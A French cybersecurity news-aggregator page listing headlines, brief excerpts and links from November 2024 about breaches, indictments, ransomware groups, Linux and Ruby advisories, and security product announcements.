L'Actu de la presse spécialisée

5 Hackers Charged for Attacking Companies via Phishing Text Messages
Federal authorities have unsealed charges against five individuals accused of orchestrating sophisticated phishing schemes that targeted employees of companies across the United States. The alleged hackers reportedly stole confidential company data and millions of dollars in cryptocurrency by exploiting stolen employee credentials. The defendants, ranging in age from 20 to 25, are accused of conspiracy […] The post 5 Hackers Charged for Attacking Companies via Phishing Text Messages appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/5-hackers-charged/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Decade-old local privilege escalation bugs impacts Ubuntu needrestart package
Decade-old flaws in the needrestart package in Ubuntu Server could allow local attackers to gain root privileges without user interaction. The Qualys Threat Research Unit (TRU) discovered five Local Privilege Escalation (LPE) decade-old security vulnerabilities in the needrestart package that could allow a local attacker to gain root privileges without requiring user interaction. The needrestart […]
https://securityaffairs.com/171228/security/privilege-escalation-bugs-ubuntu-needrestart-package.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Two PyPi Malicious Package Mimic ChatGPT & Claude Steals Developers Data
Two malicious Python packages masquerading as tools for interacting with popular AI models ChatGPT and Claude were recently discovered on the Python Package Index (PyPI), the official repository for Python libraries. These packages reportedly remained undetected for over a year, silently compromising developer environments and exfiltrating sensitive data. As reported by a cybersecurity researcher, Leonid […] The post Two PyPi Malicious Package Mimic ChatGPT & Claude Steals Developers Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/two-pypi-malicious-package-mimic-chatgpt-claude/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Helldown Ransomware Attacking VMware ESXi And Linux Servers
Helldown, a new ransomware group, actively exploits vulnerabilities to breach networks, as since August 2024, they have compromised 28 victims, leaking their data on a dedicated website.  The ransomware group IS has updated its data leak site, removing three victims, possibly indicating successful ransom payments by continuing its double extortion tactic, stealing and threatening to […] The post Helldown Ransomware Attacking VMware ESXi And Linux Servers appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/helldown-ransomware-vmware-linux/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7091-2: Ruby vulnerabilities
USN-7091-1 fixed several vulnerabilities in Ruby. This update provides the corresponding update for ruby2.7 in Ubuntu 20.04 LTS. Original advisory details: It was discovered that Ruby incorrectly handled parsing of an XML document that has specific XML characters in an attribute value using REXML gem. An attacker could use this issue to cause Ruby to crash, resulting in a denial of service. This issue only affected in Ubuntu 22.04 LTS and Ubuntu 24.04 LTS. (CVE-2024-35176, CVE-2024-39908, CVE-2024-41123) It was discovered that Ruby incorrectly handled parsing of an XML document that has many entity expansions with SAX2 or pull parser API. An attacker could use this issue to cause Ruby to crash, resulting in a denial of service. (CVE-2024-41946) It was discovered that Ruby incorrectly...
https://ubuntu.com/security/notices/USN-7091-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

macOS WorkflowKit Race Vulnerability Allows Malicious Apps to Intercept Shortcuts
A race condition vulnerability in Apple’s WorkflowKit has been identified, allowing malicious applications to intercept and manipulate shortcuts on macOS systems. This vulnerability, cataloged as CVE-2024-27821, affects the shortcut extraction and generation processes within the WorkflowKit framework, which is integral to the Shortcuts app on macOS Sonoma. macOS WorkflowKit Race Vulnerability The vulnerability arises from […] The post macOS WorkflowKit Race Vulnerability Allows Malicious Apps to Intercept Shortcuts appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/macos-workflowkit-race-vulnerability/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cyberattack at French hospital exposes health data of 750,000 patients
A data breach at an unnamed French hospital exposed the medical records of 750,000 patients after a threat actor gained access to its electronic patient record system. [...]
https://www.bleepingcomputer.com/news/security/cyberattack-at-french-hospital-exposes-health-data-of-750-000-patients/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Wireshark 4.4.2 Released: What's New!
The Wireshark Foundation has officially announced the release of Wireshark 4.4.2, the latest version of the world's most popular network protocol analyzer. Wireshark is wide use in troubleshooting, analysis, development, and educational purposes, Wireshark continues to be a vital tool for network professionals and enthusiasts. The nonprofit Wireshark Foundation, which promotes protocol analysis education, emphasizes […] The post Wireshark 4.4.2 Released: What’s New! appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/wireshark-4-4-2/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

L'Actu de la presse

Using 'Four Zeros' to boost resilience for smart finance - GovInsider
Also, achieving in-depth security across campuses, data centres, and clouds accelerates cyber attack detection, isolation, and recovery. As a ...
https://govinsider.asia/intl-en/article/using-four-zeros-to-boost-resilience-for-smart-finance
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

17000 WhatsApp Accounts Of South Asian Cyber Crooks Blocked By Centre - YouTube
Cyber Attack News | 17000 WhatsApp Accounts Of South Asian Cyber Crooks Blocked By Centre | News18 Taking a significant step against offshore ...
https://www.youtube.com/watch%3Fv%3DF2qnLrGIXFM
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

TfL cyber attack: Zip card applications reopen for 5-17 year olds - BBC
... cyber-attack that affected its systems two months ago. It also said it is now able to process refunds for all customers who have paid more than ...
https://www.bbc.com/news/articles/cgk1pp73x3xo
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

17000 WhatsApp Accounts Of South Asian Cyber Crooks Blocked By Centre - News18
Cyber Attack News | 17000 WhatsApp Accounts Of South Asian Cyber Crooks Blocked By Centre | News18Taking a significant step against offshore ...
https://www.news18.com/videos/breaking-news/cyber-attack-news-17-000-whatsapp-accounts-of-south-asian-cyber-crooks-blocked-by-centre-news18-9127537.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Italy/UAE : UAE cyber parastatal firm alumnus Luca De Fulgentis launches consultancy
The Abu Dhabi-based OryxLabs' Abu Dhabi office is building a team of battle-hardened cyber-attack experts to pitch its zero-day exploit hunting ...
https://www.intelligenceonline.com/surveillance--interception/2024/11/21/uae-cyber-parastatal-firm-alumnus-luca-de-fulgentis-launches-consultancy,110342521-art
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ukraine fires UK-supplied Storm Shadow missiles into Russia for first time - BBC
Some here do worry about the implications of this - could Russia respond with a cyber attack, or attacking undersea communication cables, for instance ...
https://www.bbc.com/news/live/c20726y20kvt
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

DDoS Attack Growing Bigger & Dangerous, New Report Reveals - Cyber Security News
... Cyber Attack DDoS Attack Growing Bigger & Dangerous, New Report Reveals. SIEM as a Service · Cyber Attack · Cyber Security News. DDoS Attack Growing ...
https://cybersecuritynews.com/ddos-attack-growing-bigger/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Telangana: Cyber Fraudsters Target Citizens with Fake PM Schemes Apps
People asked to report crime in the Golden Hour which refers to a critical time window where the victim must report a cyber attack or a threat to ...
https://www.deccanchronicle.com/southern-states/telangana/telangana-cyber-fraudsters-target-citizens-with-fake-pm-schemes-apps-1839897
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

North Korea's Cyber Strategy: An Initial Analysis - Observer Research Foundation
The cyber attack against Sony in 2014 was the first time that North Korea truly captured the world's attention. A year earlier, the Dark Seoul ...
https://www.orfonline.org/research/north-korea-s-cyber-strategy-an-initial-analysis
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Intruder 'derails' Pakistan embassy's town hall - Newspaper - DAWN.COM
WASHINGTON: The Pakistan Embassy in the US on Wednesday acknowledged a cyber-attack, when an intruder entered their...
https://www.dawn.com/news/1873755/intruder-derails-pakistan-embassys-town-hall
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Large Scale Readiness Begins Again at Niagara - DVIDS
Injects could range anywhere from a simulated cyber attack on a secured network, medical emergencies, disenfranchised Airmen, to chemical attacks, ...
https://www.dvidshub.net/news/485730/large-scale-readiness-begins-again-niagara
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

A cyber-attack will disrupt Uganda worse than the next pandemic: Let's prepare | Monitor
In my view, the world was lucky that this incident wasn't a result of a malicious cyber-attack but what if it was? And it wouldn't be the first time.
https://www.monitor.co.ug/uganda/oped/letters/a-cyber-attack-will-disrupt-uganda-worse-than-the-next-pandemic-let-s-prepare-4830788
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Soutenez No Hack Me sur Tipeee

L'Actu de la veille (Presse spécialisée)

The Heart of DolphinScheduler: In-Depth Analysis of the Quartz Scheduling Framework
Delve into Quartz, the mighty open-source Java framework for scheduling tasks, and its dynamic partnership with DolphinScheduler through QuartzExecutorImpl. Find out how they work together to orchestrate workflows and manage timings in our in-depth exploration.
https://hackernoon.com/the-heart-of-dolphinscheduler-in-depth-analysis-of-the-quartz-scheduling-framework?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SeaTunnel-Powered Data Integration: How 58 Group Handles Over 500 Billion+ Data Points Daily
Unlocking the secrets behind 58 Group's massive data handling. Learn how they process over 500 billion data points daily with Apache SeaTunnel in their data integration platform.
https://hackernoon.com/seatunnel-powered-data-integration-how-58-group-handles-over-500-billion-data-points-daily?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

FlipaClip - 892,854 breached accounts
In November 2024, the animation app FlipaClip suffered a data breach that exposed almost 900k records due to an exposed Firebase server. The impacted data included name, email address, country and date of birth. FlipaClip advised the issue has since been rectified.
https://haveibeenpwned.com/PwnedWebsites#FlipaClip
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

SquareX Brings Industry's First Browser Detection Response Solution to AISA Melbourne CyberCon 2024
Palo Alto, California, 20th November 2024, CyberNewsWire
https://hackread.com/squarex-brings-industrys-first-browser-detection-response-solution-to-aisa-melbourne-cybercon-2024/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI: Intelligence or Imitation of Intelligence?
Has AI already learned to think? Will it learn soon? Or is the destiny of even the most advanced programs to remain mere imitators of human intelligence?
https://hackernoon.com/ai-intelligence-or-imitation-of-intelligence?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Power of AI-Driven Proxy Management
In Part 4 of our six-part series on advanced web scraping, we dive into the revolutionary role of AI in proxy management. While proxies are essential for anonymity, security, and IP rotation, AI has taken this process to the next level by automating IP rotation, improving scalability, and reducing issues like rate limiting and proxy bans. AI-driven proxies can detect and bypass advanced anti-scraping measures, ensuring smoother, faster, and more reliable scraping. For optimal results, it's best to use a trusted AI-driven proxy provider like Bright Data, rather than implementing AI yourself. Stay tuned for more insights in the next part!
https://hackernoon.com/the-power-of-ai-driven-proxy-management?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

It's Near-Unanimous: AI, ML Make the SOC Better
Efficiency is the name of the game for the security operations center — and 91% of cybersecurity pros say artificial intelligence and machine learning are winning that game.
https://www.darkreading.com/cybersecurity-operations/survey-report-ai-ml-make-soc-better
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ford data breach involved a third-party supplier
Ford investigates a data breach linked to a third-party supplier and pointed out that its systems and customer data were not compromised. Ford investigation investigated a data breach after a threat actors claimed the theft of customer information on the BreachForums cybercrime. On November 17, threat actors IntelBroker and EnergyWeaponUser published a post on BreachForums […]
https://securityaffairs.com/171217/breaking-news/ford-admits-data-breach-linked-third-party-supplier.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fintech giant Finastra investigates data breach after SFTP hack
Finastra has confirmed it warned customers of a cybersecurity incident after a threat actor began selling allegedly stolen data on a hacking forum. [...]
https://www.bleepingcomputer.com/news/security/fintech-giant-finastra-investigates-data-breach-after-sftp-hack/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

MITRE shares 2024's top 25 most dangerous software weaknesses
MITRE has shared this year's top 25 list of the most common and dangerous software weaknesses behind more than 31,000 vulnerabilities disclosed between June 2023 and June 2024. [...]
https://www.bleepingcomputer.com/news/security/mitre-shares-2024s-top-25-most-dangerous-software-weaknesses/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

China's 'Liminal Panda' APT Attacks Telcos, Steals Phone Data
In US Senate testimony, a CrowdStrike exec explained how this advanced persistent threat penetrated telcos in Asia and Africa, gathering SMS messages, unique identifiers, and other metadata along the way.
https://www.darkreading.com/threat-intelligence/china-liminal-panda-telcos-phone-data
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Decoding Split Window Sensitivity in Signature Isolation Forests
Sensitivity analysis of Signature Isolation Forests reveals the importance of split windows for anomaly detection. Increasing splits improves accuracy for isolated anomalies while maintaining efficiency for persistent anomalies.
https://hackernoon.com/decoding-split-window-sensitivity-in-signature-isolation-forests?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AIntivirus Announces Initiative Inspired By The Legacy Of John McAfee
AIntivirus, a global initiative aimed at combating systemic corruption and promoting transparency, launches with a message rooted in the enduring legacy of John McAfee. The project, inspired by McAfee's outspoken stance on accountability and digital security, seeks to create a more equitable and secure digital environment.
https://hackernoon.com/aintivirus-announces-initiative-inspired-by-the-legacy-of-john-mcafee?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AI Platform bitGPT Experiences Significant Growth Following Binance Demonstration
TALLINN, Estonia, November 20th, 2024/Chainwire/--Following its global unveiling on the main stage of Binance's Blockchain Week conference in Dubai, AI platform bitGPT is experiencing sizable growth across every vertical of the project, from active partnership conversations to the number of users currently testing its technology. \ bitGPT's X and Telegram communities grew in size by more than 1,000% in the days following its presentation at Binance in which hundreds of onlookers watched as its AI platform was launched and tested for the first time in front of a public audience. The demonstration replay surpassed a quarter-million views on Binance's website within hours of being posted – the most popular replay event of the conference. \ bitGPT's live demo and subsequent growth have...
https://hackernoon.com/ai-platform-bitgpt-experiences-significant-growth-following-binance-demonstration?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fueling KYVE's Expansion Era: A New Age Of Interoperable Data Opportunities For All
KYVE is entering its expansion era, introducing an enhanced web app packed with new features and collaborations to support users and unlock multi-network potential. From experienced developers to crypto newcomers, the platform aims to make it easier for users to jump in, contribute, and benefit as part of KYVE's mission to make blockchain data accessible to all.
https://hackernoon.com/fueling-kyves-expansion-era-a-new-age-of-interoperable-data-opportunities-for-all?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

PlayBlock Rockets To 8 Globally In Blockchain Transactions And Turnover Following DappRadar Listing
PlayBlock has achieved the remarkable milestone of being ranked #8 globally in daily transactions. At the forefront of PlayBlock's ecosystem is its flagship dApp, __[UpVsDown.com], a cutting-edge prediction market platform. With its listing on __[DappRadar], PlayBlock is recognized as a global leader, surpassing hundreds of established blockchains.
https://hackernoon.com/playblock-rockets-to-8-globally-in-blockchain-transactions-and-turnover-following-dappradar-listing?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

US charges five linked to Scattered Spider cybercrime gang
The U.S. Justice Department has charged five suspects believed to be part of the financially motivated Scattered Spider cybercrime gang with conspiracy to commit wire fraud. [...]
https://www.bleepingcomputer.com/news/security/us-charges-five-linked-to-scattered-spider-cybercrime-gang/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

First Digital's FDUSD Stablecoin Is Officially Live On Sui
FDUSD is the second multi-billion dollar market cap stablecoin to natively integrate with Sui in recent months. FDUSD's multi-chain compatibility now extends to Sui, providing a genuinely interoperable stablecoin capable of driving DeFi applications across countless additional platforms. “We are thrilled to launch FDUSD on Sui and look forward to the new possibilities this integration brings,” said Vincent Chok, Founder and CEO of First Digital.
https://hackernoon.com/first-digitals-fdusd-stablecoin-is-officially-live-on-sui?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ubuntu Linux impacted by decade-old 'needrestart' flaw that gives root
Five local privilege escalation (LPE) vulnerabilities have been discovered in the needrestart utility used by Ubuntu Linux, which was introduced over 10 years ago in version 21.04. [...]
https://www.bleepingcomputer.com/news/security/ubuntu-linux-impacted-by-decade-old-needrestart-flaw-that-gives-root/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Why Everyone is Wrong About the Future of Work™
The future of work is a debate where everyone's got an opinion. Not everyone agrees on what the future holds, and their predictions are more like pieces of a play than concrete roadmaps.
https://hackernoon.com/why-everyone-is-wrong-about-the-future-of-worktm?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Redefining Anomaly Detection with Signature Isolation Forests
Signature Isolation Forest (SIF) and Kernel Signature Isolation Forest (K-SIF) enhance anomaly detection by addressing FIF's limitations. K-SIF uses kernel signatures for nonlinear feature space exploration, while SIF is fully data-driven, requiring no dictionaries.
https://hackernoon.com/redefining-anomaly-detection-with-signature-isolation-forests?source=rss
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

US and UK Military Social Network “Forces Penpals” Exposes SSN, PII Data
Forces Penpals, a social network for US and UK military personnel, exposed the sensitive data of 1.1M users,…
https://hackread.com/us-uk-military-forces-penpals-exposes-ssn-pii-data/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Alleged Ford 'Breach' Encompasses Auto Dealer Info
Cybersecurity investigators found the leaked data to be information from a third party, not Ford itself, that is already accessible to the public and not sensitive in nature.
https://www.darkreading.com/cyberattacks-data-breaches/alleged-ford-breach-auto-dealer-info
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Mageia 2024-0365: thunderbird Security Advisory Updates
Potential disclosure of plaintext in OpenPGP encrypted message. (CVE-2024-11159) References: - https://bugs.mageia.org/show_bug.cgi?id=33763
https://linuxsecurity.com/advisories/mageia/mageia-2024-0365-thunderbird-security-advisory-updates-xhpw9em7pg3d
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Leveling Up Fuzzing: Finding more vulnerabilities with AI
Posted by Oliver Chang, Dongge Liu and Jonathan Metzman, Google Open Source Security TeamRecently, OSS-Fuzz reported 26 new vulnerabilities to open source project maintainers, including one vulnerability in the critical OpenSSL library (CVE-2024-9143) that underpins much of internet infrastructure. The reports themselves aren't unusual—we've reported and helped maintainers fix over 11,000 vulnerabilities in the 8 years of the project. But these particular vulnerabilities represent a milestone for automated vulnerability finding: each was found with AI, using AI-generated and enhanced fuzz targets. The OpenSSL CVE is one of the first vulnerabilities in a critical piece of software that was discovered by LLMs, adding another real-world example to a recent Google discovery of an exploitable...
http://security.googleblog.com/2024/11/leveling-up-fuzzing-finding-more.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft confirms game audio issues on Windows 11 24H2 PCs
​Microsoft says a Windows 24H2 bug causes game audio to unexpectedly increase to full volume when using USB DAC sound systems. [...]
https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-game-audio-issues-on-windows-11-24h2-pcs/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fedora 41: llvm-test-suite 2024-6d9aba8c3c Security Advisory Updates
Remove ClamAV subdirectory because of viruses in input files: These were the findings: MultiSource/Applications/ClamAV/inputs/rtf-test/rtf1.rtf: Eicar-Signature MultiSource/Applications/ClamAV/inputs/clam.zip: Clamav.Test.File-6 MultiSource/Applications/ClamAV/inputs/rtf-test/docCLAMexe.rtf:
https://linuxsecurity.com/advisories/fedora/fedora-41-llvm-test-suite-2024-6d9aba8c3c-security-advisory-updates-huq32mkqgdnq
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

New Ghost Tap attack abuses NFC mobile payments to steal money
Cybercriminals have devised a novel method to cash out from stolen credit card details linked to mobile payment systems such as Apple Pay and Google Pay, dubbed 'Ghost Tap,' which relays NFC card data to money mules worldwide. [...]
https://www.bleepingcomputer.com/news/security/new-ghost-tap-attack-abuses-nfc-mobile-payments-to-steal-money/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Multiple Vulnerabilities in Wowza Streaming Engine (Fixed)
Rapid7 is disclosing multiple vulnerabilities in Wowza Streaming Engine below v4.9.1. These vulnerabilities are tracked as CVE-2024-52052, CVE-2024-52053, CVE-2024-52054, CVE-2024-52055, and CVE-2024-52056. They are patched as of Wowza Streaming Engine v4.9.1.
https://blog.rapid7.com/2024/11/20/multiple-vulnerabilities-in-wowza-streaming-engine-fixed/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Really Simple Security Plugin Flaw Risks 4+ Million WordPress Websites
Heads up, WordPress admins! The WordPress plugin Really Simple Security had a serious security flaw.… Really Simple Security Plugin Flaw Risks 4+ Million WordPress Websites on Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses.
https://latesthackingnews.com/2024/11/20/really-simple-security-plugin-flaw-risks-4-million-wordpress-websites/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fedora 40: llvm-test-suite 2024-300397332b Security Advisory Updates
Remove ClamAV subdirectory because of viruses in input files: These were the findings: MultiSource/Applications/ClamAV/inputs/rtf-test/rtf1.rtf: Eicar-Signature MultiSource/Applications/ClamAV/inputs/clam.zip: Clamav.Test.File-6 MultiSource/Applications/ClamAV/inputs/rtf-test/docCLAMexe.rtf:
https://linuxsecurity.com/advisories/fedora/fedora-40-llvm-test-suite-2024-300397332b-security-advisory-updates-lxg0cnzev0j7
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ANY.RUN Sandbox Automates Interactive Analysis of Complex Cyber Attack Chains
ANY.RUN, a well-known interactive malware analysis platform, has announced Smart Content Analysis, an enhancement to its Automated Interactivity feature. This new mechanism is designed to automatically analyze and detonate complex malware and phishing attacks, providing investigators with quicker and more detailed insights into malicious behavior. Speed Optimization for Investigations: Accelerates the analysis workflow, saving time […] The post ANY.RUN Sandbox Automates Interactive Analysis of Complex Cyber Attack Chains appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/any-run-sandbox-now-automates-interactive-analysis/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hacker obtained documents tied to lawsuit over Matt Gaetz's sexual misconduct allegations
A hacker allegedly accessed a file containing testimony from a woman claiming she had sex with Matt Gaetz when she was 17, sparking controversy. The New York Times reported that a hacker, who goes online with the name name Altam Beezley, gained access to files containing confidential testimony from a woman who claims she had […]
https://securityaffairs.com/171207/security/matt-gaetzs-sexual-misconduct-allegations-doc-compromised.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 20)
We detail the observed limited activity regarding authentication bypass vulnerability CVE-2024-0012 affecting specific versions of PAN-OS software, and include protections and mitigations. The post Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 20) appeared first on Unit 42.
https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Apple Urgently Patches Actively Exploited Zero-Days
Though information regarding the exploits is limited, the company did report that Intel-based Mac systems have been targeted by cybercriminals looking to exploit CVE-2024-44308 and CVE-2024-44309.
https://www.darkreading.com/cyberattacks-data-breaches/apple-patches-actively-exploited-zero-days
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ransom & Dark Web Issues Week 3, November 2024
ASEC Blog publishes Ransom & Dark Web Issues Week 3, November 2024           New Ransomware Gang Termite: Four Victim Companies Revealed, Including a U.S. Auto Parts Supplier and a German Social Welfare Organization New Ransomware Gang Chort: Six Victim Companies Revealed, Including the Kuwait Public Authority for Agriculture and Fish Resources […] 게시물 Ransom & Dark Web Issues Week 3, November 2024이 ASEC에 처음 등장했습니다.
https://asec.ahnlab.com/en/84664/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Small US Cyber Agencies Are Underfunded & That's a Problem
If the US wants to maintain its lead in cybersecurity, it needs to make the tough funding decisions that are demanded of it.
https://www.darkreading.com/vulnerabilities-threats/us-cyber-agencies-underfunded-problem
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Hackers Exploit Misconfigured Jupyter Servers for Illegal Sports Streaming
Aqua Nautilus' research reveals hackers are leveraging vulnerable and misconfigured Jupyter Notebook servers to steal live sports streams.…
https://hackread.com/hackers-exploit-misconfigured-jupyter-servers-sports-streaming/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

ANY.RUN Sandbox Now Automates Interactive Analysis of Complex Cyber Attack Chains
Dubai, United Arab Emirates, 20th November 2024, CyberNewsWire
https://hackread.com/any-run-sandbox-now-automates-interactive-analysis-of-complex-cyber-attack-chains/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Who's managing cybersecurity at organizations that don't have a CISO?
This week in cybersecurity from the editors at Cybercrime Magazine –Read the Full Story in CSO Sausalito, Calif. – Nov. 20, 2024 Many companies have yet to embrace the role of chief information security officer (CISO), but with the ever-expanding threat landscape, there are growing The post Who's managing cybersecurity at organizations that don't have a CISO? appeared first on Cybercrime Magazine.
https://cybersecurityventures.com/whos-managing-cybersecurity-at-organizations-that-dont-have-a-ciso/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

'Water Barghest' Sells Hijacked IoT Devices for Proxy Botnet Misuse
An elusive, sophisticated cybercriminal group has used known and zero-day vulnerabilities to compromise more than 20,000 SOHO routers and other IoT devices so far, and then puts them up for sale on a residential proxy marketplace for state-sponsored cyber-espionage actors and others to use.
https://www.darkreading.com/cloud-security/water-barghest-sells-hijacked-iot-devices-proxy-botnet-misuse
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Rekoobe Backdoor In Open Directories Possibly Attacking TradingView Users
APT31, using the Rekoobe backdoor, has been observed targeting TradingView, a popular financial platform, as researchers discovered malicious domains mimicking TradingView, suggesting a potential interest in compromising the platform’s user community.  By analyzing shared SSH keys, investigators identified additional infrastructure linked to this campaign and another open directory, highlighting the evolving tactics employed by APT31 […] The post Rekoobe Backdoor In Open Directories Possibly Attacking TradingView Users appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/rekoobe-backdoor-tradingview/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Water Barghest Botnet Comprised 20,000+ IoT Devices By Exploiting Vulnerabilities
Water Barghest, a sophisticated botnet, exploits vulnerabilities in IoT devices to enlist them in a residential proxy marketplace by leveraging automated scripts to identify vulnerable devices from public databases like Shodan.  When the device is compromised, the Ngioweb malware is installed in a stealthy manner, thereby establishing a connection to command-and-control servers.  The infected device […] The post Water Barghest Botnet Comprised 20,000+ IoT Devices By Exploiting Vulnerabilities appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/water-barghest-iot-exploit/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Fedora 39: chromium 2024-9c44ad3527 Security Advisory Updates
Update to 130.0.6723.116
https://linuxsecurity.com/advisories/fedora/fedora-39-chromium-2024-9c44ad3527-security-advisory-updates-gwpnhm0rvwbx
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

North Korean IT Worker Using Weaponized Video Conference Apps To Attack Job Seakers
North Korean IT workers, operating under the cluster CL-STA-0237, have been implicated in recent phishing attacks leveraging malware-infected video conference apps.  The group, likely based in Laos, has demonstrated a sophisticated approach, infiltrating a U.S.-based SMB IT services company to gain access to sensitive information and secure a position at a major tech company.  It […] The post North Korean IT Worker Using Weaponized Video Conference Apps To Attack Job Seakers appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
https://gbhackers.com/north-korean-it-worker-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ubuntu 7123-1: Linux kernel (Azure) Security Advisory Updates
Several security issues were fixed in the Linux kernel.
https://linuxsecurity.com/advisories/ubuntu/ubuntu-7123-1-linux-kernel-azure-security-advisory-updates-f5btv0midyxl
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Rapid7 Extends AWS Support to Include Coverage for Newly-Launched Resource Control Policies (RCPs)
Rapid7 is excited to announce our support for Amazon Web Services' (AWS) new Resource Control Policies (RCPs), a powerful tool designed to bolster security controls for organizations using AWS infrastructure.
https://blog.rapid7.com/2024/11/20/rapid7-extends-aws-support-to-include-coverage-for-newly-launched-resource-control-policies-rcps/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Protecting your digital assets from non-human identity attacks
Untethered data accessibility and workflow automation are now foundational elements of most digital infrastructures. With the right applications and protocols in place, businesses no longer need to feel restricted by their lack of manpower or technical capabilities — machines are now filling those gaps. The use of non-human identities (NHIs) to power business-critical applications — […] The post Protecting your digital assets from non-human identity attacks appeared first on Security Intelligence.
https://securityintelligence.com/articles/protecting-digital-assets-non-human-identity-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Ubuntu 7121-2: Linux kernel (Azure) Security Advisory Updates
Several security issues were fixed in the Linux kernel.
https://linuxsecurity.com/advisories/ubuntu/ubuntu-7121-2-linux-kernel-azure-security-advisory-updates-m6twan4nsh9w
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

“Sad announcement” email leads to tech support scam
People are receiving disturbing emails that appear to imply something has happened to their friend or family member.
https://www.malwarebytes.com/blog/news/2024/11/sad-announcement-email-leads-to-tech-support-scam
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Amazon and Audible flooded with 'forex trading' and warez listings
Amazon, Amazon Music, and Audible, an Amazon-owned online audiobook and podcast service, have been flooded with bogus listings that push dubious "forex trading" sites, Telegram channels, and suspicious links claiming to offer pirated software. [...]
https://www.bleepingcomputer.com/news/security/amazon-and-audible-flooded-with-forex-trading-and-warez-listings/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7120-2: Linux kernel vulnerabilities
Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system. This update corrects flaws in the following subsystems: - File systems infrastructure; - Network traffic control; (CVE-2024-46800, CVE-2024-43882)
https://ubuntu.com/security/notices/USN-7120-2
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

USN-7121-2: Linux kernel (Azure) vulnerabilities
